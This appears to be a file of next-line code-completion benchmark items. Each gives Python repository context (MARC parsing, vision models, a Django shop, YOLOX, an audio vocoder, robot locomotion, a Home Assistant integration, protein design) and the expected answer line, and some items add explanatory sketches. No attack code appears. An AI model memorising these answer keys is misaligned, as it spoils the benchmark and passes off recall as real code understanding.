""" schema = _make_parquet_schema(rules) writer = ParquetWriter(parquet_output, schema, compression="SNAPPY") for records_batch in records_iter(marc_input, rules=rules, batch=batch): table = pyarrow.Table.from_pylist(records_batch, schema) writer.write_table(table) writer.close() # Path: test_marctable.py import json import pathlib import pandas from io import StringIO from marctable.marc import MARC, SchemaFieldError, SchemaSubfieldError, crawl from marctable.utils import _mapping, dataframe_iter, to_csv, to_dataframe, to_parquet from pytest import raises marc = MARC.from_avram() def test_crawl() -> None: # crawl the first 10 field definitions from the loc site (to save time) outfile = StringIO() crawl(10, quiet=True, outfile=outfile) outfile.seek(0) # ensure the Avram JSON parses and looks ok schema = json.load(outfile) assert schema assert len(schema["fields"]) == 10 # ensure that the Avram JSON for a field looks ok assert schema["fields"]["015"] f015 = schema["fields"]["015"] assert f015["label"] == "National Bibliography Number" assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html" assert len(f015["subfields"]) == 6 # ensure that the Avram JSON for a subfield looks ok assert f015["subfields"]["2"] f0152 = f015["subfields"]["2"] assert f0152["label"] == "Source" assert f0152["code"] == "2" assert f0152["repeatable"] is False def test_marc() -> None: assert len(marc.fields) == 215 def test_get_field() -> None: assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
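The answer leans on pytest.raises with match, where match is a regular expression searched against the string of the raised exception; a self-contained reminder:

# Minimal demonstration of the raises(..., match=...) idiom used above.
from pytest import raises

class SchemaFieldError(Exception):
    pass

def get_field(tag: str):
    raise SchemaFieldError(f"{tag} is not a defined field tag in Avram schema")

with raises(SchemaFieldError, match="abc is not a defined field tag"):
    get_field("abc")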
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: WangWenhao0716/ViT4ICD # Path: Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py def resnet50_ibn_a(pretrained=False, **kwargs): """Constructs a ResNet-50 model. Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs) if pretrained: print("Loading a pre-trained model!") state_dict = torch.load(model_urls['ibn_resnet50a'], map_location=torch.device('cpu'))['state_dict'] state_dict = remove_module_key(state_dict) model.load_state_dict(state_dict) return model # Path: Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py def resnet101_ibn_a(pretrained=False, **kwargs): """Constructs a ResNet-101 model. Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs) if pretrained: state_dict = torch.load(model_urls['ibn_resnet101a'], map_location=torch.device('cpu'))['state_dict'] state_dict = remove_module_key(state_dict) model.load_state_dict(state_dict) return model # Path: Stage_23/dg/models_gem_waveblock_balance_cos/gem.py class GeneralizedMeanPoolingP(GeneralizedMeanPooling): """ Same, but norm is trainable """ def __init__(self, norm=3, output_size=1, eps=1e-6): super(GeneralizedMeanPoolingP, self).__init__(norm, output_size, eps) self.p = nn.Parameter(torch.ones(1) * norm) # Path: Stage_23/dg/models_gem_waveblock_balance_cos/metric.py def build_metric(loss_type, in_dim, out_dim, s=64, m=0.35, **kwargs): if (loss_type=='circle'): return CircleLoss(in_dim, out_dim, s, m) elif (loss_type=='arc'): return Arcface(in_dim, out_dim, s, m) elif (loss_type=='cos'): return MarginCosineProduct(in_dim, out_dim, s, m) elif (loss_type=='am'): return AMSoftmax(in_dim, out_dim, s, m) else: assert "Unknown metric {}".format(loss_type) # Path: Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn.py from torch import nn from torch.nn import functional as F from torch.nn import init from .resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a from .gem import GeneralizedMeanPoolingP from .metric import build_metric import torchvision import torch import random from __future__ import absolute_import __all__ = ['ResNetIBN', 'resnet_ibn50a', 'resnet_ibn101a'] class Waveblock(nn.Module): def __init__(self): super().__init__() def forward(self, x): if self.training: h, w = x.size()[-2:] rh = round(0.3 * h) sx = random.randint(0, h-rh) mask = (x.new_ones(x.size()))*1.5 mask[:, :, sx:sx+rh, :] = 1 x = x * mask return x class ResNetIBN(nn.Module): __factory = {
'50a': resnet50_ibn_a,
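The answer fills the first entry of the __factory registry. The pattern, a class-level dict from depth keys to constructors, reduced to a runnable sketch (create is a hypothetical helper name, and the lambdas stand in for the real resnet builders):

class ResNetIBN:
    __factory = {
        '50a': lambda **kw: f"resnet50_ibn_a({kw})",    # stand-ins for the
        '101a': lambda **kw: f"resnet101_ibn_a({kw})",  # real constructors
    }

    @classmethod
    def create(cls, depth: str, **kwargs):
        if depth not in cls.__factory:
            raise KeyError(f"Unknown depth: {depth}")
        return cls.__factory[depth](**kwargs)

print(ResNetIBN.create('50a', pretrained=True))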
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Noubissie237/myShop # Path: myShop/shop/utiles.py def commandeAnonyme(request, data): print("utilisateur non authentifie") print('cookies', request.COOKIES) name = data['form']['name'] print('data', data) print('name', name) username = data['form']['username'] email = data['form']['email'] phone = data['form']['phone'] cookie_panier = panier_cookie(request) articles = cookie_panier['articles'] client, created = Client.objects.get_or_create( email = email ) client.name = name client.save() commande = Commande.objects.create( client=client ) for article in articles: produit = Produit.objects.get(id=article['produit']['id']) CommandeArticle.objects.create( produit=produit, commande = commande, quantite = article['quantite'] ) return client, commande # Path: myShop/shop/utiles.py def data_cookie(request): if request.user.is_authenticated: client = request.user.client commande, created = Commande.objects.get_or_create(client=client, complete=False) articles = commande.commandearticle_set.all() nombre_article = commande.get_panier_article else: cookie_panier = panier_cookie(request) articles = cookie_panier['articles'] commande = cookie_panier['commande'] nombre_article = cookie_panier['nombre_article'] context = { 'articles': articles, 'commande': commande, 'nombre_article': nombre_article } return context # Path: myShop/shop/utiles.py def panier_cookie(request): try: panier = json.loads(request.COOKIES.get('panier')) except: panier = {} articles = [] commande = { 'get_panier_total':0, 'get_panier_article':0, 'produit_physique':False, } nombre_article = commande['get_panier_article'] try: for obj in panier: nombre_article += panier[obj]['qte'] produit = Produit.objects.get(id=obj) total = (produit.price * panier[obj]['qte']) commande['get_panier_article'] += panier[obj]['qte'] commande['get_panier_total'] += total article = { 'produit':{ 'id': produit.id, 'name': produit.name, 'price': produit.price, 'imageUrl': produit.imageUrl }, 'quantite': panier[obj]['qte'], 'get_total': total } articles.append(article) if produit.digital == False: commande['produit_physique'] = True except: pass context = { 'articles': articles, 'commande': commande, 'nombre_article': nombre_article } return context # Path: myShop/shop/views.py from django.shortcuts import render from .models import * from django.http import JsonResponse from datetime import datetime from .utiles import commandeAnonyme, data_cookie, panier_cookie import json def shop(request, *args, **kwargs): """ Main view """ produits = Produit.objects.all() data = data_cookie(request) nombre_article = data['nombre_article'] context = { 'produits':produits, 'nombre_article': nombre_article } return render(request, 'shop/index.html', context) def panier(request, *args, **kwargs): """ Cart """ data = data_cookie(request) articles = data['articles'] commande = data['commande'] nombre_article = data['nombre_article'] context = { 'articles':articles, 'commande':commande, 'nombre_article':nombre_article } return render(request, 'shop/panier.html', context) def commande(request, *args, **kwargs): """ Order """ data = data_cookie(request) articles = data['articles'] commande = data['commande'] nombre_article = data['nombre_article'] context = { 'articles':articles, 'commande':commande, 'nombre_article': nombre_article } return render(request, 'shop/commande.html', context) def update_article(request, *args, **kwargs): data = json.loads(request.body) produit_id = data['produit_id'] action = data['action'] client = request.user.client produit = Produit.objects.get(id=produit_id) commande, created = Commande.objects.get_or_create(client=client, complete=False) commande_article, created = CommandeArticle.objects.get_or_create(commande=commande, produit=produit) if action == 'add': commande_article.quantite += 1 if action == 'remove': commande_article.quantite -= 1 commande_article.save() if commande_article.quantite <= 0: commande_article.delete() return JsonResponse("Article ajouté", safe=False) def traitementCommande(request, *args, **kwargs): """ Processing and validation of the order, with data-integrity checks (fraud detection) """ STATUS_TRANSACTION = ['ACCEPTED', 'COMPLETED', 'SUCESS'] transaction_id = datetime.now().timestamp() data = json.loads(request.body) print(data) if request.user.is_authenticated: client = request.user.client commande, created = Commande.objects.get_or_create(client=client, complete=False) else:
client, commande = commandeAnonyme(request, data)
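The answer falls back to commandeAnonyme for unauthenticated checkouts. The cookie-cart arithmetic that panier_cookie performs can be isolated as below; PRICES is a made-up stand-in for the Produit lookups:

import json

PRICES = {"1": 1500, "2": 700}  # hypothetical product id -> price

def cart_totals(cookie_value: str):
    # The 'panier' cookie maps product id -> {'qte': n}; accumulate per item.
    try:
        panier = json.loads(cookie_value)
    except (TypeError, ValueError):
        panier = {}
    total = count = 0
    for pid, item in panier.items():
        count += item['qte']
        total += PRICES[pid] * item['qte']
    return total, count

assert cart_totals('{"1": {"qte": 2}, "2": {"qte": 1}}') == (3700, 3)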
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: alibaba/u2mot # Path: yolox/models/darknet.py class Darknet(nn.Module): # number of blocks from dark2 to dark5. depth2blocks = {21: [1, 2, 2, 1], 53: [2, 8, 8, 4]} def __init__( self, depth, in_channels=3, stem_out_channels=32, out_features=("dark3", "dark4", "dark5"), ): """ Args: depth (int): depth of darknet used in model, usually use [21, 53] for this param. in_channels (int): number of input channels, for example, use 3 for RGB image. stem_out_channels (int): number of output chanels of darknet stem. It decides channels of darknet layer2 to layer5. out_features (Tuple[str]): desired output layer name. """ super().__init__() assert out_features, "please provide output features of Darknet" self.out_features = out_features self.stem = nn.Sequential( BaseConv(in_channels, stem_out_channels, ksize=3, stride=1, act="lrelu"), *self.make_group_layer(stem_out_channels, num_blocks=1, stride=2), ) in_channels = stem_out_channels * 2 # 64 num_blocks = Darknet.depth2blocks[depth] # create darknet with `stem_out_channels` and `num_blocks` layers. # to make model structure more clear, we don't use `for` statement in python. self.dark2 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[0], stride=2) ) in_channels *= 2 # 128 self.dark3 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[1], stride=2) ) in_channels *= 2 # 256 self.dark4 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[2], stride=2) ) in_channels *= 2 # 512 self.dark5 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[3], stride=2), *self.make_spp_block([in_channels, in_channels * 2], in_channels * 2), ) def make_group_layer(self, in_channels: int, num_blocks: int, stride: int = 1): "starts with conv layer then has `num_blocks` `ResLayer`" return [ BaseConv(in_channels, in_channels * 2, ksize=3, stride=stride, act="lrelu"), *[(ResLayer(in_channels * 2)) for _ in range(num_blocks)], ] def make_spp_block(self, filters_list, in_filters): m = nn.Sequential( *[ BaseConv(in_filters, filters_list[0], 1, stride=1, act="lrelu"), BaseConv(filters_list[0], filters_list[1], 3, stride=1, act="lrelu"), SPPBottleneck( in_channels=filters_list[1], out_channels=filters_list[0], activation="lrelu", ), BaseConv(filters_list[0], filters_list[1], 3, stride=1, act="lrelu"), BaseConv(filters_list[1], filters_list[0], 1, stride=1, act="lrelu"), ] ) return m def forward(self, x): outputs = {} x = self.stem(x) outputs["stem"] = x x = self.dark2(x) outputs["dark2"] = x x = self.dark3(x) outputs["dark3"] = x x = self.dark4(x) outputs["dark4"] = x x = self.dark5(x) outputs["dark5"] = x return {k: v for k, v in outputs.items() if k in self.out_features} # Path: yolox/models/network_blocks.py class BaseConv(nn.Module): """A Conv2d -> Batchnorm -> silu/leaky relu block""" def __init__( self, in_channels, out_channels, ksize, stride, groups=1, bias=False, act="silu" ): super().__init__() # use same padding pad = (ksize - 1) // 2 self.conv = nn.Conv2d( in_channels, out_channels, kernel_size=ksize, stride=stride, padding=pad, groups=groups, bias=bias, ) self.bn = nn.BatchNorm2d(out_channels) self.act = get_activation(act, inplace=True) def forward(self, x): ''' x --> Conv2d --> BN --> activation 
--> x ''' return self.act(self.bn(self.conv(x))) # Conv ==> BN ==> activate def fuseforward(self, x): return self.act(self.conv(x)) # Path: yolox/models/yolo_fpn.py import torch import torch.nn as nn from .darknet import Darknet from .network_blocks import BaseConv #!/usr/bin/env python3 # -*- encoding:utf-8 -*- # Copyright (c) 2014-2021 Megvii Inc. All rights reserved. # Copyright (c) Alibaba, Inc. and its affiliates. class YOLOFPN(nn.Module): """ YOLOFPN module. Darknet 53 is the default backbone of this model. """ def __init__( self, depth=53, in_features=["dark3", "dark4", "dark5"], ): super().__init__() self.backbone = Darknet(depth) self.in_features = in_features # out 1 self.out1_cbl = self._make_cbl(512, 256, 1) self.out1 = self._make_embedding([256, 512], 512 + 256) # out 2 self.out2_cbl = self._make_cbl(256, 128, 1) self.out2 = self._make_embedding([128, 256], 256 + 128) # upsample self.upsample = nn.Upsample(scale_factor=2, mode="nearest") def _make_cbl(self, _in, _out, ks):
return BaseConv(_in, _out, ks, stride=1, act="lrelu")
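The answer returns a BaseConv with "same" padding. A compact equivalent of that Conv -> BN -> activation unit in plain torch, assuming the 'lrelu' activation maps to LeakyReLU(0.1) as LRELU_SLOPE suggests:

import torch
import torch.nn as nn

def make_cbl(c_in: int, c_out: int, ksize: int) -> nn.Sequential:
    # pad = (ksize - 1) // 2 keeps spatial size unchanged at stride 1
    return nn.Sequential(
        nn.Conv2d(c_in, c_out, ksize, stride=1, padding=(ksize - 1) // 2, bias=False),
        nn.BatchNorm2d(c_out),
        nn.LeakyReLU(0.1, inplace=True),
    )

x = torch.randn(1, 512, 16, 16)
assert make_cbl(512, 256, 1)(x).shape == (1, 256, 16, 16)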
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: liuhuang31/HiFTNet-sr # Path: utils.py def init_weights(m, mean=0.0, std=0.01): classname = m.__class__.__name__ if classname.find("Conv") != -1: m.weight.data.normal_(mean, std) # Path: utils.py def get_padding(kernel_size, dilation=1): return int((kernel_size*dilation - dilation)/2) # Path: stft.py class TorchSTFT(torch.nn.Module): def __init__(self, filter_length=800, hop_length=200, win_length=800, window='hann'): super().__init__() self.filter_length = filter_length self.hop_length = hop_length self.win_length = win_length self.window = torch.from_numpy(get_window(window, win_length, fftbins=True).astype(np.float32)) def transform(self, input_data): forward_transform = torch.stft( input_data, self.filter_length, self.hop_length, self.win_length, window=self.window.to(input_data.device), return_complex=True) return torch.abs(forward_transform), torch.angle(forward_transform) def inverse(self, magnitude, phase): inverse_transform = torch.istft( magnitude * torch.exp(phase * 1j), self.filter_length, self.hop_length, self.win_length, window=self.window.to(magnitude.device)) return inverse_transform.unsqueeze(-2) # unsqueeze to stay consistent with conv_transpose1d implementation def forward(self, input_data): self.magnitude, self.phase = self.transform(input_data) reconstruction = self.inverse(self.magnitude, self.phase) return reconstruction # Path: models.py import torch import torch.nn.functional as F import torch.nn as nn import numpy as np from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm from utils import init_weights, get_padding from stft import TorchSTFT LRELU_SLOPE = 0.1 class ResBlock1(torch.nn.Module): def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)): super(ResBlock1, self).__init__() self.h = h self.convs1 = nn.ModuleList([ weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], padding=get_padding(kernel_size, dilation[0]))), weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], padding=get_padding(kernel_size, dilation[1]))), weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], padding=get_padding(kernel_size, dilation[2]))) ])
self.convs1.apply(init_weights)
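The answer applies init_weights across the freshly built ModuleList. nn.Module.apply recurses into every submodule, and the hook filters by class name, as in utils.init_weights; a minimal sketch:

import torch.nn as nn

def init_weights(m, mean=0.0, std=0.01):
    # matches utils.init_weights: only touch modules named like "Conv..."
    if m.__class__.__name__.find("Conv") != -1:
        m.weight.data.normal_(mean, std)

convs = nn.ModuleList([nn.Conv1d(4, 4, 3, padding=1) for _ in range(3)])
convs.apply(init_weights)  # .apply() visits each Conv1d in the list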
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: m-abr/FCPCodebase # Path: agent/Base_Agent.py class Base_Agent(): all_agents = [] def __init__(self, host:str, agent_port:int, monitor_port:int, unum:int, robot_type:int, team_name:str, enable_log:bool=True, enable_draw:bool=True, apply_play_mode_correction:bool=True, wait_for_server:bool=True, hear_callback=None) -> None: self.radio = None # hear_message may be called during Server_Comm instantiation self.logger = Logger(enable_log, f"{team_name}_{unum}") self.world = World(robot_type, team_name, unum, apply_play_mode_correction, enable_draw, self.logger, host) self.world_parser = World_Parser(self.world, self.hear_message if hear_callback is None else hear_callback) self.scom = Server_Comm(host,agent_port,monitor_port,unum,robot_type,team_name,self.world_parser,self.world,Base_Agent.all_agents,wait_for_server) self.inv_kinematics = Inverse_Kinematics(self.world.robot) self.behavior = Behavior(self) self.path_manager = Path_Manager(self.world) self.radio = Radio(self.world, self.scom.commit_announcement) self.behavior.create_behaviors() Base_Agent.all_agents.append(self) @abstractmethod def think_and_send(self): pass def hear_message(self, msg:bytearray, direction, timestamp:float) -> None: if direction != "self" and self.radio is not None: self.radio.receive(msg) def terminate(self): # close shared monitor socket if this is the last agent on this thread self.scom.close(close_monitor_socket=(len(Base_Agent.all_agents)==1)) Base_Agent.all_agents.remove(self) @staticmethod def terminate_all(): for o in Base_Agent.all_agents: o.scom.close(True) # close shared monitor socket, if it exists Base_Agent.all_agents = [] # Path: behaviors/custom/Step/Step_Generator.py class Step_Generator(): GRAVITY = 9.81 Z0 = 0.2 def __init__(self, feet_y_dev, sample_time, max_ankle_z) -> None: self.feet_y_dev = feet_y_dev self.sample_time = sample_time self.state_is_left_active = False self.state_current_ts = 0 self.switch = False # switch legs self.external_progress = 0 # non-overlaped progress self.max_ankle_z = max_ankle_z def get_target_positions(self, reset, ts_per_step, z_span, z_extension): ''' Get target positions for each foot Returns ------- target : `tuple` (Left leg y, Left leg z, Right leg y, Right leg z) ''' assert type(ts_per_step)==int and ts_per_step > 0, "ts_per_step must be a positive integer!" 
#-------------------------- Advance 1ts if reset: self.ts_per_step = ts_per_step # step duration in time steps self.swing_height = z_span self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints self.state_current_ts = 0 self.state_is_left_active = False self.switch = False elif self.switch: self.state_current_ts = 0 self.state_is_left_active = not self.state_is_left_active # switch leg self.switch = False else: self.state_current_ts += 1 #-------------------------- Compute COM.y W = math.sqrt(self.Z0/self.GRAVITY) step_time = self.ts_per_step * self.sample_time time_delta = self.state_current_ts * self.sample_time y0 = self.feet_y_dev # absolute initial y value y_swing = y0 + y0 * ( math.sinh((step_time - time_delta)/W) + math.sinh(time_delta/W) ) / math.sinh(-step_time/W) #-------------------------- Cap maximum extension and swing height z0 = min(-self.max_leg_extension, self.max_ankle_z) # capped initial z value zh = min(self.swing_height, self.max_ankle_z - z0) # capped swing height #-------------------------- Compute Z Swing progress = self.state_current_ts / self.ts_per_step self.external_progress = self.state_current_ts / (self.ts_per_step-1) active_z_swing = zh * math.sin(math.pi * progress) #-------------------------- Accept new parameters after final step if self.state_current_ts + 1 >= self.ts_per_step: self.ts_per_step = ts_per_step # step duration in time steps self.swing_height = z_span self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints self.switch = True #-------------------------- Distinguish active leg if self.state_is_left_active: return y0+y_swing, active_z_swing+z0, -y0+y_swing, z0 else: return y0-y_swing, z0, -y0-y_swing, active_z_swing+z0 # Path: behaviors/custom/Step/Step.py from agent.Base_Agent import Base_Agent from behaviors.custom.Step.Step_Generator import Step_Generator import numpy as np class Step(): def __init__(self, base_agent : Base_Agent) -> None: self.world = base_agent.world self.ik = base_agent.inv_kinematics self.description = "Step (Skill-Set-Primitive)" self.auto_head = True nao_specs = self.ik.NAO_SPECS self.leg_length = nao_specs[1] + nao_specs[3] # upper leg height + lower leg height feet_y_dev = nao_specs[0] * 1.2 # wider step sample_time = self.world.robot.STEPTIME max_ankle_z = nao_specs[5] # Initialize step generator with constants
self.step_generator = Step_Generator(feet_y_dev, sample_time, max_ankle_z)
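The answer constructs the Step_Generator with the geometry constants above. The linear-inverted-pendulum COM.y curve inside get_target_positions is plain math and can be checked numerically; the step duration below is hypothetical:

import math

GRAVITY, Z0 = 9.81, 0.2            # constants from Step_Generator
W = math.sqrt(Z0 / GRAVITY)

def com_y(y0: float, step_time: float, t: float) -> float:
    # lateral COM offset: zero at both ends of the step, peaking mid-step
    return y0 + y0 * (math.sinh((step_time - t) / W)
                      + math.sinh(t / W)) / math.sinh(-step_time / W)

T = 0.21                            # hypothetical step duration in seconds
assert abs(com_y(0.055, T, 0.0)) < 1e-9 and abs(com_y(0.055, T, T)) < 1e-9
print(com_y(0.055, T, T / 2))       # peak lateral shift at mid-step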
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: koenhendriks/ha-button-plus # Path: custom_components/button_plus/button_plus_api/local_api_client.py class LocalApiClient: """ Client to talk to Button+ local devices """ def __init__(self, ip_address, session) -> None: self._base = f"http://{ip_address}" self._session = session _LOGGER.debug(f"Initialize Button+ local API client") async def fetch_config(self): url = f"{self._base}/config" _LOGGER.debug(f"fetch_config {url}") async with self._session.get(url) as response: return await response.text() async def push_config(self, config): url = f"{self._base}/configsave" _LOGGER.debug(f"push_config {url}") async with self._session.post(url, data=config.to_json()) as response: return await response.text() # Path: custom_components/button_plus/button_plus_api/model.py class DeviceConfiguration: def __init__(self, info: Info, core: Core, mqtt_buttons: List[MqttButton], mqtt_displays: List[MqttDisplay], mqtt_brokers: List[MqttBroker], mqtt_sensors: List[MqttSensor]): self.info = info self.core = core self.mqtt_buttons = mqtt_buttons self.mqtt_displays = mqtt_displays self.mqtt_brokers = mqtt_brokers self.mqtt_sensors = mqtt_sensors @staticmethod def from_json(json_data: str) -> 'DeviceConfiguration': data = json.loads(json_data) return DeviceConfiguration( info=Info.from_dict(data['info']), core=Core.from_dict(data['core']), mqtt_buttons=[MqttButton.from_dict(button) for button in data['mqttbuttons']], mqtt_displays=[MqttDisplay.from_dict(display) for display in data['mqttdisplays']], mqtt_brokers=[MqttBroker.from_dict(broker) for broker in data['mqttbrokers']], mqtt_sensors=[MqttSensor.from_dict(sensor) for sensor in data['mqttsensors']], ) def to_json(self) -> str: def serialize(obj): if hasattr(obj, '__dict__'): d = obj.__dict__.copy() # Convert the root keys if isinstance(obj, DeviceConfiguration): d['mqttbuttons'] = [serialize(button) for button in d.pop('mqtt_buttons')] d['mqttdisplays'] = [serialize(display) for display in d.pop('mqtt_displays')] d['mqttbrokers'] = [serialize(broker) for broker in d.pop('mqtt_brokers')] d['mqttsensors'] = [serialize(sensor) for sensor in d.pop('mqtt_sensors')] if isinstance(obj, Info): d['id'] = d.pop('device_id') d['ipaddress'] = d.pop('ip_address') d['largedisplay'] = d.pop('large_display') elif isinstance(obj, Connector): d['id'] = d.pop('connector_id') d['type'] = d.pop('connector_type') elif isinstance(obj, Sensor): d['sensorid'] = d.pop('sensor_id') elif isinstance(obj, Core): d['autobackup'] = d.pop('auto_backup') d['brightnesslargedisplay'] = d.pop('brightness_large_display') d['brightnessminidisplay'] = d.pop('brightness_mini_display') d['ledcolorfront'] = d.pop('led_color_front') d['ledcolorwall'] = d.pop('led_color_wall') # Custom mappings for MqttButton class elif isinstance(obj, MqttButton): d['id'] = d.pop('button_id') d['toplabel'] = d.pop('top_label') d['ledcolorfront'] = d.pop('led_color_front') d['ledcolorwall'] = d.pop('led_color_wall') d['longdelay'] = d.pop('long_delay') d['longrepeat'] = d.pop('long_repeat') elif isinstance(obj, Topic): d['brokerid'] = d.pop('broker_id') d['eventtype'] = d.pop('event_type') elif isinstance(obj, MqttDisplay): d['fontsize'] = d.pop('font_size') d['topics'] = [serialize(topic) 
for topic in d['topics']] elif isinstance(obj, MqttBroker): d['brokerid'] = d.pop('broker_id') d['wsport'] = d.pop('ws_port') elif isinstance(obj, MqttSensor): d['sensorid'] = d.pop('sensor_id') d['topic'] = serialize(d['topic']) # Filter out None values return {k: v for k, v in d.items() if v is not None} else: return str(obj) return json.dumps(self, default=serialize, indent=4) # Path: custom_components/button_plus/const.py DOMAIN = "button_plus" # Path: custom_components/button_plus/const.py MANUFACTURER = "Button+" # Path: custom_components/button_plus/buttonplushub.py import logging from homeassistant.config_entries import ConfigEntry from homeassistant.helpers import device_registry as dr from .button_plus_api.local_api_client import LocalApiClient from .button_plus_api.model import DeviceConfiguration from homeassistant.core import HomeAssistant from .const import DOMAIN, MANUFACTURER from homeassistant.helpers import aiohttp_client """Button+ connects several devices.""" from __future__ import annotations _LOGGER: logging.Logger = logging.getLogger(__package__) class ButtonPlusHub: """hub for Button+.""" def __init__(self, hass: HomeAssistant, config: DeviceConfiguration, entry: ConfigEntry) -> None: _LOGGER.debug(f"New hub with config {config.core}") self._hass = hass self.config = config self._name = config.core.name self._id = self.config.info.device_id self._client = LocalApiClient(config.info.ip_address, aiohttp_client.async_get_clientsession(hass)) self.online = True self.button_entities = {} self.label_entities = {} self.top_label_entities = {} device_registry = dr.async_get(hass) device_registry.async_get_or_create( configuration_url=f"http://{self.config.info.ip_address}/", config_entry_id=entry.entry_id, connections={(dr.CONNECTION_NETWORK_MAC, self.config.info.mac)},
identifiers={(DOMAIN, self.config.info.device_id)},
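The answer adds the device-registry identifiers tuple. The snake_case-to-device-JSON renaming that to_json performs in DeviceConfiguration can be reduced to a standalone sketch of one branch:

# A reduced sketch of the serializer pattern above: copy __dict__, rename
# snake_case keys to the device's JSON names, drop None values. Info here is
# a cut-down stand-in for the real model class.
import json

class Info:
    def __init__(self, device_id, ip_address):
        self.device_id = device_id
        self.ip_address = ip_address
        self.note = None  # None values are filtered out below

def serialize(obj):
    d = obj.__dict__.copy()
    d['id'] = d.pop('device_id')
    d['ipaddress'] = d.pop('ip_address')
    return {k: v for k, v in d.items() if v is not None}

print(json.dumps(serialize(Info(7, "192.168.1.10")), indent=4))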
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: RosettaCommons/AF2_peptide_hallucination # Path: util/util.py def select_positions(n_mutations, boundcomplex, select_positions, select_position_params): ''' Select mutable positions in the binder based on a specific method. Returns a dictionary of binder with associated array indicating mutable positions. ''' mutable_positions = {} if select_positions == 'random': # Choose positions randomly. mutable_positions['binder'] = np.random.choice(range(len(boundcomplex.current_binder_seq)), size=n_mutations, replace=False) elif select_positions == 'plddt': # Choose positions based on lowest plddt in binder sequence. # First/last three positions of binder are choice frequency adjusted to avoid picking N/C term every time (they tend to score much lower). mutate_plddt_quantile = 0.5 # default worst pLDDT quantile to mutate. # Get plddts from sequence object (binder) plddts = boundcomplex.current_prediction_results["plddt"] # Take just binder segment plddts = plddts[:boundcomplex.binder_length,] # Weights associated with each position in the binder. # to account for termini systematically scoring worse in pLDDT. weights = np.array([0.25, 0.5, 0.75] + [1] * (boundcomplex.binder_length - 6) + [0.75, 0.5, 0.25]) n_potential = round(boundcomplex.binder_length * mutate_plddt_quantile) potential_sites = np.argsort(plddts)[:n_potential] # Select mutable sites sub_w = weights[potential_sites] sub_w = [w/np.sum(sub_w) for w in sub_w] sites = np.random.choice(potential_sites, size=n_mutations, replace=False, p=sub_w) mutable_positions['binder'] = sites return mutable_positions # Path: util/util.py def select_positions(n_mutations, boundcomplex, select_positions, select_position_params): def get_aa_freq(AA_freq: dict, exclude_AA: str): def initialize_MCMC(conf): def initialize_score_file(conf) -> None: def append_score_file(i, accepted, T, n_mutations, try_loss, try_scores, conf) -> None: def accept_or_reject(boundcomplex, T, step): def write_outputs(boundcomplex, conf, i) -> None: def relabel_chains(pdb_lines): M = np.linspace(int(Mi), int(Mf), conf.hallucination.steps) # stepped linear decay of the mutation rate # Path: util/loss.py def compute_loss(conf, boundcomplex): """ Computes losses as defined by the config file """ losses=OrderedDict() for loss_name in conf: loss_function = globals().get(loss_name, None) if loss_function is not None and callable(loss_function): losses[loss_name] = loss_function(boundcomplex) else: raise ValueError(f"Loss function {loss_name} not found") total_loss=combine_loss(losses, conf) return total_loss, losses # Path: run.py import os import sys import numpy as np import hydra import copy from submodules.oligomer_hallucination.oligomer_hallucination import Protomers, Oligomer from submodules.oligomer_hallucination.oligomer_hallucination import AA_FREQ from submodules.oligomer_hallucination.modules.af2_net import setup_models, predict_structure from submodules.oligomer_hallucination.modules.mutations import mutate from util.util import select_positions from util import util from util.loss import compute_loss from omegaconf import DictConfig, OmegaConf from hydra.core.hydra_config import HydraConfig class BoundComplex(Protomers, Oligomer): ''' Class for 
